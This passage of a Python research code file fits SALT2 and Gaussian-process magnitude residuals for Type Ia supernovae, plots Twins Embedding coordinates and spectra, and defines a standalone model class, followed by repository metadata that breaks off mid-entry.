& self.uncertainty_mask\n & self.redshift_color_mask\n )\n else:\n raise TwinsEmbeddingException(\"Unknown kind %s!\" % kind)\n\n # Use the Isomap embedding for the GP coordinates.\n coordinates = self.embedding\n\n # If the analysis is blinded, only use the training data for conditioning.\n if self.settings['blinded']:\n condition_mask &= self.train_mask\n\n return coordinates, mags, mag_errs, colors, condition_mask\n\n def fit_gp_magnitude_residuals(self, kind=\"rbtl\", mask=None,\n additional_covariates=[], verbosity=None):\n \"\"\"Calculate magnitude residuals using a GP over a given latent space.\"\"\"\n if verbosity is None:\n verbosity = self.settings['verbosity']\n\n # Fit the hyperparameters on the full conditioning sample.\n coordinates, mags, mag_errs, colors, raw_mask = self._get_gp_data(kind)\n\n # Build a list of linear covariates to use in the model that includes the color\n # and any user-specified covariates.\n covariates = [\n colors,\n ]\n\n if additional_covariates:\n covariates.append(additional_covariates)\n\n covariates = np.vstack(covariates)\n\n # Apply the user-specified mask if one was given.\n if mask is None:\n mask = raw_mask\n else:\n mask = mask & raw_mask\n\n manifold_gp = ManifoldGaussianProcess(\n self,\n self.embedding,\n mags,\n mag_errs,\n covariates,\n mask,\n )\n\n manifold_gp.fit(verbosity=verbosity)\n\n return manifold_gp\n\n def _evaluate_salt_magnitude_residuals(self, additional_covariates,\n intrinsic_dispersion, ref_mag, alpha, beta,\n *covariate_slopes):\n \"\"\"Evaluate SALT2 magnitude residuals for a given set of standardization\n parameters\n\n Parameters\n ----------\n additional_covariates : list of arrays\n Additional covariates to use in the fits (e.g. host properties). This should\n be a list of arrays, each of which has the same length as the number of\n SNe Ia in the dataset.\n intrinsic_dispersion : float\n Assumed intrinsic dispersion of the sample.\n ref_mag : float\n The intrinsic B-band brightness of Type Ia supernovae\n alpha : float\n Standardization coefficient for the SALT2 x1 parameter\n beta : float\n Standardization coefficient for the SALT2 color parameter\n covariate_slopes : list\n Slopes for each of the additional covariates.\n\n Returns\n -------\n residuals : numpy.array\n The SALT2 magnitude residuals for every target in the dataset\n residual_uncertainties : numpy.array\n The associated uncertainties on the SALT2 magnitude residuals.\n \"\"\"\n salt_fits = self.salt_fits\n\n mb = -2.5*np.log10(salt_fits['x0'].data)\n x0_err = salt_fits['x0_err'].data\n mb_err = utils.frac_to_mag(x0_err / salt_fits['x0'].data)\n x1_err = salt_fits['x1_err'].data\n color_err = salt_fits['c_err'].data\n\n cov_mb_x1 = salt_fits['covariance'].data[:, 1, 2] * -mb_err / x0_err\n cov_color_mb = salt_fits['covariance'].data[:, 1, 3] * -mb_err / x0_err\n cov_color_x1 = salt_fits['covariance'].data[:, 2, 3]\n\n peculiar_velocity_uncertainties = \\\n self.calculate_peculiar_velocity_uncertainties(self.redshifts)\n\n model = (\n ref_mag\n - alpha * salt_fits['x1'].data\n + beta * salt_fits['c'].data\n )\n\n for slope, covariate in zip(covariate_slopes, additional_covariates):\n model += slope * covariate\n\n residual_uncertainties = np.sqrt(\n intrinsic_dispersion**2\n + peculiar_velocity_uncertainties**2\n + mb_err**2\n + alpha**2 * x1_err**2\n + beta**2 * color_err**2\n + 2 * alpha * cov_mb_x1\n - 2 * beta * cov_color_mb\n - 2 * alpha * beta * cov_color_x1\n )\n\n residuals = mb - model\n\n return residuals, residual_uncertainties\n\n def fit_salt_magnitude_residuals(self, mask=None, additional_covariates=[],\n bootstrap=False, verbosity=None):\n \"\"\"Calculate SALT2 magnitude residuals\n\n This follows the standard procedure of estimating the alpha and beta correction\n parameters using an assumed intrinsic dispersion, then solving for the intrinsic\n dispersion that sets the chi-square to 1. We repeat this procedure until the\n intrinsic dispersion converges.\n \"\"\"\n if verbosity is None:\n verbosity = self.settings['verbosity']\n\n # Start with a complete mask if there wasn't a user specified one.\n if mask is None:\n mask = np.ones(len(self.salt_fits), dtype=bool)\n else:\n mask = mask.copy()\n\n # Reject bad SALT2 fits.\n mask &= self.salt_mask\n\n # Apply the Twins Manifold mask. This ensures that we are comparing to the same\n # sample.\n mask &= self.uncertainty_mask\n\n # Require reasonable redshifts and colors for the determination of\n # standardization parameters. The redshift_color_mask produced by the\n # read_between_the_lines algorithm does this.\n mask &= self.redshift_color_mask\n\n if bootstrap:\n # Do a bootstrap resampling of the dataset. We can use this to estimate\n # uncertainties on all of our parameters.\n mask = np.random.choice(np.where(mask)[0], np.sum(mask))\n\n # Starting value for intrinsic dispersion. We will update this in each\n # round to set chi2 = 1\n intrinsic_dispersion = 0.1\n\n for i in range(10):\n def calc_dispersion(*fit_parameters):\n residuals, residual_uncertainties = \\\n self._evaluate_salt_magnitude_residuals(additional_covariates,\n *fit_parameters)\n\n mask_residuals = residuals[mask]\n mask_residual_uncertainties = residual_uncertainties[mask]\n\n weights = 1 / mask_residual_uncertainties**2\n\n dispersion = np.sqrt(\n np.sum(weights * mask_residuals**2)\n / np.sum(weights)\n )\n\n return dispersion\n\n def to_min_fit_parameters(x):\n return calc_dispersion(intrinsic_dispersion, *x)\n\n start_vals = [-10, 0.13, 3.0] + [0.] * len(additional_covariates)\n\n res = minimize(to_min_fit_parameters, start_vals)\n fit_parameters = res.x\n\n if verbosity >= 2:\n print(f\"Pass {i}, ref_mag={fit_parameters[0]:.3f}, \"\n f\"alpha={fit_parameters[1]:.3f}, \"\n f\"beta={fit_parameters[2]:.3f}\")\n\n # Reestimate intrinsic dispersion.\n def chisq(intrinsic_dispersion):\n residuals, residual_uncertainties = \\\n self._evaluate_salt_magnitude_residuals(\n additional_covariates, intrinsic_dispersion, *res.x\n )\n\n mask_residuals = residuals[mask]\n mask_residual_uncertainties = residual_uncertainties[mask]\n\n dof = 4 + len(additional_covariates)\n\n return np.sum(\n mask_residuals**2 / mask_residual_uncertainties**2\n ) / (len(mask_residuals) - dof)\n\n def to_min_intrinsic_dispersion(x):\n chi2 = chisq(x[0])\n return (chi2 - 1)**2\n\n res_int_disp = minimize(\n to_min_intrinsic_dispersion,\n [intrinsic_dispersion],\n bounds=[(0, None)],\n )\n\n old_intrinsic_dispersion = intrinsic_dispersion\n intrinsic_dispersion = res_int_disp.x[0]\n\n if verbosity >= 2:\n print(\" -> new intrinsic_dispersion=%.3f\" % intrinsic_dispersion)\n\n if np.abs(intrinsic_dispersion - old_intrinsic_dispersion) < 1e-5:\n break\n else:\n raise Exception(\"Intrinsic dispersion didn't converge!\")\n\n # Calculate the SALT2 magnitude residuals.\n residuals, residual_uncertainties = self._evaluate_salt_magnitude_residuals(\n additional_covariates, intrinsic_dispersion, *fit_parameters\n )\n\n # Calculate SALT2 uncertainties without the intrinsic dispersion component.\n raw_uncertainties = np.sqrt(\n residual_uncertainties**2 - intrinsic_dispersion**2\n )\n\n result = {\n 'mask': mask,\n 'ref_mag': res.x[0],\n 'alpha': res.x[1],\n 'beta': res.x[2],\n 'intrinsic_dispersion': intrinsic_dispersion,\n 'wrms': res.fun,\n 'rms': np.std(residuals[mask]),\n 'nmad': math.nmad(residuals[mask]),\n 'residuals': residuals,\n 'residual_uncertainties': residual_uncertainties,\n 'raw_residual_uncertainties': raw_uncertainties,\n }\n\n if verbosity >= 1:\n print(\"SALT2 magnitude residuals fit: \")\n # print(f\" ref_mag: {result['ref_mag']:.3f}\")\n print(f\" alpha: {result['alpha']:.3f}\")\n print(f\" beta: {result['beta']:.3f}\")\n print(f\" σ_int: {result['intrinsic_dispersion']:.3f}\")\n print(f\" RMS: {result['rms']:.3f}\")\n print(f\" NMAD: {result['nmad']:.3f}\")\n print(f\" WRMS: {result['wrms']:.3f}\")\n\n for i in range(len(additional_covariates)):\n covariate_amplitude = res.x[3 + i]\n result[f'covariate_amplitude_{i}'] = covariate_amplitude\n if verbosity >= 1:\n print(f\" amp[{i}]: {covariate_amplitude:.3f}\")\n\n return result\n\n def bootstrap_salt_magnitude_residuals(self, num_samples=100, *args, **kwargs):\n \"\"\"Bootstrap the SALT2 magnitude residuals fit to get parameter uncertainties.\n\n Parameters\n ----------\n num_samples : int\n The number of bootstrapping samples to do.\n *args, **kwargs\n Additional parameters passed to calculate_salt_magnitude_residuals.\n\n Returns\n -------\n reference : dict\n The reference values for the non-bootstrapped data.\n samples : `astropy.table.Table`\n A Table with all of the keys from calculate_salt_magnitude_residuals with\n one row per bootstrap.\n \"\"\"\n # Calculate reference result\n reference = self.fit_salt_magnitude_residuals(*args, verbosity=0, **kwargs)\n\n # Do bootstrapping\n samples = []\n\n for i in tqdm(range(num_samples), leave=False, desc='SALT2 bootstrapping'):\n samples.append(\n self.fit_salt_magnitude_residuals(*args, bootstrap=True, verbosity=0,\n **kwargs)\n )\n\n samples = table.Table(samples)\n\n return reference, samples\n\n def calculate_fit_rv(self, slope, slope_uncertainty=None):\n \"\"\"Calculate the true RV value given an additional correction in AV that was\n applied to the the corrected magnitude residuals.\n \"\"\"\n def to_min(x, measured_color_law):\n return np.sum((extinction.fitzpatrick99(self.wave, x[0], x[1]) -\n measured_color_law)**2)\n\n res = minimize(\n to_min,\n [1., self.settings['rbtl_fiducial_rv']],\n args=(self.rbtl_color_law + slope,)\n )\n true_rv = res.x[1]\n\n if slope_uncertainty is None:\n return true_rv\n else:\n res_up = minimize(\n to_min,\n res.x,\n args=(self.rbtl_color_law + slope + slope_uncertainty,)\n )\n\n res_down = minimize(\n to_min,\n res.x,\n args=(self.rbtl_color_law + slope - slope_uncertainty,)\n )\n\n true_rv_uncertainty = (res_up.x[1] - res_down.x[1]) / 2.\n return true_rv, true_rv_uncertainty\n\n def scatter(self, variable, mask=None, weak_mask=None, label=None, axis_1=0,\n axis_2=1, axis_3=None, invert_colorbar=False, **kwargs):\n \"\"\"Make a scatter plot of some variable against the Isomap coefficients\n\n variable is the values to use for the color axis of the plot.\n\n A boolean array can be specified for cut to specify which points to use in the\n plot. If cut is None, then the full variable list is used.\n\n The target variable can be passed with or without the cut already applied. This\n function will check and automatically apply it or ignore it so that the variable\n array has the same length as the coefficient arrays.\n\n Optionally, a weak cut can be performed where spectra not passing the cut are\n plotted as small points rather than being completely omitted. To do this,\n specify the \"weak_cut\" parameter with a boolean array that has the length of the\n the variable array after the base cut.\n\n Any kwargs are passed to plt.scatter directly.\n \"\"\"\n use_embedding = self.embedding\n use_var = variable\n\n if mask is not None:\n use_embedding = use_embedding[mask]\n use_var = use_var[mask]\n\n cmap = self.settings['colormap']\n\n if invert_colorbar:\n cmap = cmap.reversed()\n\n marker_size = self.settings['scatter_plot_marker_size']\n\n if weak_mask is not None:\n # Variable marker size\n marker_size = 10 + (marker_size - 10) * weak_mask[mask]\n\n plot_kwargs = {\n 's': marker_size,\n 'edgecolors': 'gray',\n 'cmap': cmap,\n }\n plot_kwargs.update(kwargs)\n\n fig = plt.figure()\n\n if use_embedding.shape[1] >= 3 and axis_3 is not None:\n ax = fig.add_subplot(111, projection=\"3d\")\n plot = ax.scatter(\n use_embedding[:, axis_1],\n use_embedding[:, axis_2],\n use_embedding[:, axis_3],\n c=use_var,\n **plot_kwargs\n )\n ax.set_zlabel(\"$\\\\xi_%d$\" % (axis_3 + 1))\n else:\n ax = fig.add_subplot(111)\n plot = ax.scatter(\n use_embedding[:, axis_1],\n use_embedding[:, axis_2],\n c=use_var,\n **plot_kwargs\n )\n\n ax.set_xlabel(\"$\\\\xi_%d$\" % (axis_1 + 1))\n ax.set_ylabel(\"$\\\\xi_%d$\" % (axis_2 + 1))\n\n if label is not None:\n cb = fig.colorbar(plot, label=label)\n else:\n cb = fig.colorbar(plot)\n\n if invert_colorbar:\n # workaround: in my version of matplotlib, the ticks disappear if\n # you invert the colorbar y-axis. Save the ticks, and put them back\n # to work around that bug.\n ticks = cb.get_ticks()\n cb.ax.invert_yaxis()\n cb.set_ticks(ticks)\n\n def scatter_combined(self, variable, mask=None, label=None, axis_1=0, axis_2=1,\n axis_3=2, vmin=None, vmax=None, cmap=None,\n discrete_color_map=None, invert_colorbar=False, **kwargs):\n \"\"\"Scatter plot that shows three components simultaneously while preserving\n aspect ratios.\n\n The height of the figure will be adjusted automatically to produce the right\n aspect ratio.\n \"\"\"\n use_embedding = self.embedding\n\n if np.ndim(variable) == 2:\n c12 = variable[0]\n c13 = variable[1]\n c32 = variable[2]\n else:\n c12 = c13 = c32 = variable\n\n if mask is not None:\n use_embedding = use_embedding[mask]\n c12 = c12[mask]\n c13 = c13[mask]\n c32 = c32[mask]\n\n if discrete_color_map is not None:\n cmap = ListedColormap(discrete_color_map.values())\n color_id_map = {j: i for i, j in enumerate(discrete_color_map)}\n c12 = [color_id_map[i] for i in c12]\n c13 = [color_id_map[i] for i in c13]\n c32 = [color_id_map[i] for i in c32]\n else:\n if cmap is None:\n cmap = self.settings['colormap']\n\n if invert_colorbar:\n cmap = cmap.reversed()\n\n sm = plt.cm.ScalarMappable(cmap=cmap, norm=plt.Normalize(vmin=vmin,\n vmax=vmax))\n sm._A = []\n\n c12 = sm.to_rgba(c12)\n c13 = sm.to_rgba(c13)\n c32 = sm.to_rgba(c32)\n\n min_1 = np.min(use_embedding[:, axis_1])\n max_1 = np.max(use_embedding[:, axis_1])\n min_2 = np.min(use_embedding[:, axis_2])\n max_2 = np.max(use_embedding[:, axis_2])\n min_3 = np.min(use_embedding[:, axis_3])\n max_3 = np.max(use_embedding[:, axis_3])\n\n range_1 = max_1 - min_1\n range_2 = max_2 - min_2\n range_3 = max_3 - min_3\n\n border = 0.1\n\n min_1 -= border * range_1\n max_1 += border * range_1\n min_2 -= border * range_2\n max_2 += border * range_2\n min_3 -= border * range_3\n max_3 += border * range_3\n\n range_1 *= (1 + 2. * border)\n range_2 *= (1 + 2. * border)\n range_3 *= (1 + 2. * border)\n\n if discrete_color_map:\n # Don't show a colorbar\n ncols = 2\n width_ratios = [range_1, range_3]\n else:\n # Add axes for a colorbar\n colorbar_frac = 0.025\n\n plot_width = 1 - colorbar_frac\n width_1 = plot_width * range_1 / (range_1 + range_3)\n width_3 = plot_width * range_3 / (range_1 + range_3)\n\n ncols = 3\n width_ratios = [width_1, width_3, colorbar_frac]\n\n # Set the figure width. The height will be adjusted automatically to produce the\n # right aspect ratio.\n fig_width = self.settings['combined_scatter_plot_width']\n fig = plt.figure(figsize=(fig_width, fig_width))\n gs = GridSpec(\n 2, ncols,\n figure=fig,\n height_ratios=[range_3, range_2],\n width_ratios=width_ratios,\n )\n\n ax12 = fig.add_subplot(gs[1, 0])\n ax13 = fig.add_subplot(gs[0, 0], sharex=ax12)\n ax32 = fig.add_subplot(gs[1, 1], sharey=ax12)\n\n if discrete_color_map:\n # Show the legend in the middle of the upper right open space.\n legend_ax = fig.add_subplot(gs[0, 1])\n legend_ax.axis('off')\n else:\n # Show the colorbar on the right side of everything.\n cax = fig.add_subplot(gs[:, 2])\n\n plot_kwargs = {\n 's': self.settings['combined_scatter_plot_marker_size'],\n 'edgecolors': 'gray',\n }\n\n if discrete_color_map:\n plot_kwargs['cmap'] = cmap\n\n plot_kwargs.update(kwargs)\n\n scatter = ax12.scatter(\n use_embedding[:, axis_1],\n use_embedding[:, axis_2],\n c=c12,\n **plot_kwargs,\n )\n ax12.set_xlabel(f'$\\\\xi_{axis_1 + 1}$')\n ax12.set_ylabel(f'$\\\\xi_{axis_2 + 1}$')\n ax12.set_xlim(min_1, max_1)\n ax12.set_ylim(min_2, max_2)\n\n ax13.scatter(\n use_embedding[:, axis_1],\n use_embedding[:, axis_3],\n c=c13,\n **plot_kwargs\n )\n ax13.set_ylabel(f'$\\\\xi_{axis_3 + 1}$')\n ax13.tick_params(labelbottom=False)\n ax13.set_ylim(min_3, max_3)\n\n ax32.scatter(\n use_embedding[:, axis_3],\n use_embedding[:, axis_2],\n c=c32,\n **plot_kwargs\n )\n ax32.set_xlabel(f'$\\\\xi_{axis_3 + 1}$')\n ax32.tick_params(labelleft=False)\n ax32.set_xlim(min_3, max_3)\n\n if discrete_color_map:\n # Show a legend with the discrete colors\n legend_ax.legend(handles=scatter.legend_elements()[0],\n labels=discrete_color_map.keys(),\n loc='center')\n else:\n # Show a colorbar\n if label is not None:\n cb = fig.colorbar(sm, cax=cax, label=label)\n else:\n cb = fig.colorbar(sm, cax=cax)\n\n if invert_colorbar:\n # workaround: in my version of matplotlib, the ticks disappear if\n # you invert the colorbar y-axis. Save the ticks, and put them back\n # to work around that bug.\n ticks = cb.get_ticks()\n cb.ax.invert_yaxis()\n cb.set_ticks(ticks)\n\n # Calculate the aspect ratio, and regenerate the figure a few times until we get\n # it right.\n while True:\n fig.canvas.draw()\n\n coord = ax12.get_position() * fig.get_size_inches()\n plot_width = coord[1][0] - coord[0][0]\n plot_height = coord[1][1] - coord[0][1]\n plot_ratio = plot_height / plot_width\n\n aspect_ratio = plot_ratio / ax12.get_data_ratio()\n\n if np.abs(aspect_ratio - 1) < 0.001:\n # Good enough\n break\n\n fig.set_size_inches([fig_width, fig.get_size_inches()[1] / aspect_ratio])\n\n return ax12, ax13, ax32\n\n def plot_flux(self, ax, flux, fluxerr=None, *args, c=None, label=None,\n uncertainty_label=None, **kwargs):\n \"\"\"Plot a spectrum.\n\n See settings.py for details about the normalization and labeling of spectra.\n \"\"\"\n wave = self.wave\n\n plot_format = self.settings['spectrum_plot_format']\n\n if plot_format == 'f_nu':\n plot_scale = wave**2 / 5000.**2\n elif plot_format == 'f_lambda':\n plot_scale = 1.\n else:\n raise TwinsEmbeddingException(f\"Invalid plot format {plot_format}\")\n\n flux = np.atleast_2d(flux)\n if fluxerr is not None:\n fluxerr = np.atleast_2d(fluxerr)\n\n for idx in range(len(flux)):\n if label is None:\n use_label = None\n elif np.isscalar(label):\n if idx == 0:\n use_label = label\n else:\n use_label = None\n else:\n use_label = label[idx]\n\n ax.plot(wave, flux[idx] * plot_scale, *args, c=c, label=use_label, **kwargs)\n\n if fluxerr is not None:\n if uncertainty_label is None:\n use_uncertainty_label = None\n elif np.isscalar(uncertainty_label):\n if idx == 0:\n use_uncertainty_label = uncertainty_label\n else:\n use_uncertainty_label = None\n else:\n use_uncertainty_label = uncertainty_label[idx]\n\n ax.fill_between(\n wave,\n (flux[idx] - fluxerr[idx]) * plot_scale,\n (flux[idx] + fluxerr[idx]) * plot_scale,\n facecolor=c,\n alpha=0.3,\n label=use_uncertainty_label,\n )\n\n ax.set_xlabel(self.settings['spectrum_plot_xlabel'])\n ax.set_ylabel(self.settings['spectrum_plot_ylabel'])\n ax.autoscale()\n ax.set_ylim(0, None)\n\n if label is not None:\n ax.legend()\n\n def savefig(self, filename, figure=None, **kwargs):\n \"\"\"Save a matplotlib figure\n\n Parameters\n ----------\n filename : str\n The output filename. This will be placed in the directory specified by\n self.settings['figure_directory']\n figure : `matplotlib.pyplot.figure` instance or None\n The matplotlib figure to save. If figure is None, then we get the current\n figure from matplotlib and save that.\n **kwargs\n Additional kwargs to pass to savefig.\n \"\"\"\n if figure is None:\n figure = plt.gcf()\n\n directory = self.settings['figure_directory']\n os.makedirs(directory, exist_ok=True)\n\n path = os.path.join(directory, filename)\n\n figure.savefig(\n path,\n **kwargs\n )\n\n def latex_open(self, filename):\n \"\"\"Open a given latex file for writing, and make directories if need be.\n\n Parameters\n ----------\n filename : str\n The output filename. This will be placed in the directory specified by\n self.settings['latex_directory']\n \"\"\"\n directory = self.settings['latex_directory']\n os.makedirs(directory, exist_ok=True)\n\n path = os.path.join(directory, filename)\n\n return open(path, 'w')\n\n\nclass TwinsEmbeddingModel():\n \"\"\"A standalone implementation of the Twins Embedding model.\n\n This can be used to predict the flux of a supernova at any given coordinates in\n the Twins Embedding. The model will be loaded from data stored in the models\n directory.\n \"\"\"\n def __init__(self, data=None):\n if data is None:\n data = self._load_data('./models/twins_embedding_1.pkl')\n\n self.data = data\n\n # Build the GPs\n self.gps = []\n for idx in range(len(self.data['gp_parameters'])):\n gp = ManifoldGaussianProcess(\n None,\n self.data['ref_coordinates'][idx],\n self.data['ref_values'][idx],\n self.data['ref_uncertainties'][idx],\n parameters=self.data['gp_parameters'][idx]\n )\n self.gps.append(gp)\n\n def write(self, path):\n with open(path, 'wb') as f:\n pickle.dump(self.data, f)\n\n @classmethod\n def _load_data(cls, path):\n with open(path, 'rb') as f:\n data = pickle.load(f)\n return data\n\n @classmethod\n def load(cls, path):\n data = cls._load_data(path)\n return cls(data)\n\n @property\n def wave(self):\n return self.data['wave']\n\n def evaluate_phase_difference(self, phase):\n phase_difference = (\n self.data['phase_slope'] * phase\n + self.data['phase_quadratic'] * phase * phase\n )\n\n return phase_difference\n\n def evaluate_phase_dispersion(self, phase):\n coefs = self.data['phase_dispersion_coefficients']\n num_phase_coefficients = len(coefs)\n phase_scale = np.abs((num_phase_coefficients / 2)\n * (phase / self.data['phase_range']))\n full_bins = int(np.floor(phase_scale))\n remainder = phase_scale - full_bins\n\n phase_coefficients = np.zeros(num_phase_coefficients)\n\n for j in range(full_bins + 1):\n if j == full_bins:\n weight = remainder\n else:\n weight = 1\n\n if weight == 0:\n break\n\n if phase > 0:\n phase_bin = num_phase_coefficients // 2 + j\n else:\n phase_bin = num_phase_coefficients // 2 - 1 - j\n\n phase_coefficients[phase_bin] = weight\n\n fractional_dispersion = phase_coefficients.dot(coefs)\n\n return fractional_dispersion\n\n def evaluate(self, phase, magnitude, color, coordinates):\n # Make sure that we are in bounds\n phase_range = self.data['phase_range']\n if np.abs(phase) > phase_range:\n raise Exception(f\"Invalid phase {phase}, must be between -{phase_range}\"\n f\" and {phase_range}.\")\n\n # Phase shifts\n phase_difference = self.evaluate_phase_difference(phase)\n phase_dispersion = self.evaluate_phase_dispersion(phase)\n\n # Figure out the scale\n scale = (\n self.data['mean_flux']\n * 10**(-0.4 * (\n magnitude\n + self.data['color_law'] * color\n + phase_difference)\n )\n )\n\n # Evaluate each GP\n pred = []\n pred_error = []\n for gp in self.gps:\n iter_pred, iter_pred_error = gp.predict(coordinates)\n pred.append(iter_pred)\n pred_error.append(iter_pred_error)\n\n pred = (1 + np.array(pred)[:, 0])\n pred_error = (np.array(pred_error)[:, 0])\n\n # Apply the scale\n flux = scale * pred\n flux_error = scale * pred_error\n\n # Add in uncertainties from the phase interpolation model. They are measured\n # in fractions of the flux.\n flux_error = np.sqrt(\n flux_error**2\n + (phase_dispersion * flux)**2\n )\n\n return flux, flux_error\n", "repo_name": "snfactory/twins_embedding", "sub_path": "twins_embedding.py", "file_name": "twins_embedding.py", "file_ext": "py", "file_size_in_byte": 68055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "settings.default_settings", "line_number": 31, "usage_type": "argument"}, {"api_name": "matplotlib.rcParams", "line_number": 36, "usage_type": "attribute"}, {"api_name": "idrtools.Dataset.from_idr", "line_number": 86, "usage_type": "call"}, {"api_name": "idrtools.Dataset", "line_number": 86, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "tqdm.autonotebook.tqdm", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 182, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 187, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 187, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 194, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 272, "usage_type": "call"}, {"api_name": "utils.load_stan_model", "line_number": 303, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 315, "usage_type": "call"}, {"api_name": "utils.load_stan_result", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 345, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 372, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 383, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 396, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 400, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 400, "usage_type": "attribute"}, {"api_name": "utils.save_stan_result", "line_number": 410, "usage_type": "call"}, {"api_name": "extinction.fitzpatrick99", "line_number": 421, "usage_type": "call"}, {"api_name": "utils.load_stan_model", "line_number": 427, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 440, "usage_type": "call"}, {"api_name": "utils.load_stan_result", "line_number": 444, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 458, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 459, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 464, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 465, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 476, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 476, "usage_type": "attribute"}, {"api_name": "utils.save_stan_result", "line_number": 481, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 500, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 505, "usage_type": "call"}, {"api_name": "idrtools.math.calculate_covariance_finite_difference", "line_number": 509, "usage_type": "call"}, {"api_name": "idrtools.math", "line_number": 509, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 512, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 512, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 517, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 525, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 526, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 532, "usage_type": "attribute"}, {"api_name": "utils.frac_to_mag", "line_number": 551, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 554, "usage_type": "call"}, {"api_name": "utils.frac_to_mag", "line_number": 555, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 558, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 567, "usage_type": "call"}, {"api_name": "numpy.errstate", "line_number": 573, "usage_type": "call"}, {"api_name": "sklearn.manifold.Isomap", "line_number": 595, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 609, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 613, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 616, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 632, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 632, "usage_type": "name"}, {"api_name": "astropy.table.hstack", "line_number": 646, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 646, "usage_type": "name"}, {"api_name": "astropy.table.MaskedColumn", "line_number": 658, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 658, "usage_type": "name"}, {"api_name": "astropy.table.Table", "line_number": 664, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 664, "usage_type": "name"}, {"api_name": "astropy.table.Table", "line_number": 668, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 668, "usage_type": "name"}, {"api_name": "specind.Spectrum", "line_number": 681, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 687, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 687, "usage_type": "name"}, {"api_name": "astropy.table.Table.read", "line_number": 719, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 719, "usage_type": "attribute"}, {"api_name": "astropy.table", "line_number": 719, "usage_type": "name"}, {"api_name": "astropy.table.Table", "line_number": 722, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 722, "usage_type": "name"}, {"api_name": "astropy.table.join", "line_number": 725, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 725, "usage_type": "name"}, {"api_name": "pickle.loads", "line_number": 733, "usage_type": "call"}, {"api_name": "numpy.ma.masked_array", "line_number": 743, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 743, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 743, "usage_type": "attribute"}, {"api_name": "astropy.table.Table", "line_number": 746, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 746, "usage_type": "name"}, {"api_name": "astropy.table.Table", "line_number": 799, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 799, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 866, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 867, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 868, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 872, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 872, 